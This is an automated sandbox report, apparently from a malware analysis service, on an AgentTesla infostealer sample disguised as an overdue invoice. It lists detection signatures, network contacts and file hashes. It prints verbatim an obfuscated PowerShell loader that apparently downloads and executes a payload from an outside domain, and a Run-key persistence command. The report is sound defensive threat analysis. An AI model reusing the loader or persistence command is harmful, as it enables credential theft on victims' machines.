Analysis Overview
SHA256
5bda2e2623e9c30c9571c974005206a3ebd4e66009069f0105597a9449ff7c57
Threat Level: Known bad
The file overdue_invoice.ace was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 09:18
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 09:18
Reported
2024-06-03 09:20
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" | C:\Windows\SysWOW64\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4980 set thread context of 5016 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. 
ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH 
SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa 
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. 
ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH 
SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa 
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.innovativebuildingsolutions.in | udp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| US | 8.8.8.8:53 | 98.58.21.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| IN | 103.21.58.98:443 | www.innovativebuildingsolutions.in | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4issik1.lhn.ps1
| Algorithm | Digest |
| --- | --- |
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Roaming\Skrmet.Kli
| Algorithm | Digest |
| --- | --- |
| MD5 | 9916e5a5f7afe8c1f861f93999a875f3 |
| SHA1 | 8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc |
| SHA256 | 97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df |
| SHA512 | 30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 09:18
Reported
2024-06-03 09:20
Platform
win7-20240221-en
Max time kernel
141s
Max time network
147s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\tonsillectomic = "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\\Codebtors\\').Typeregningens;%Rundsavsbladene% ($sartor)" | C:\Windows\SysWOW64\reg.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1964 set thread context of 2112 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
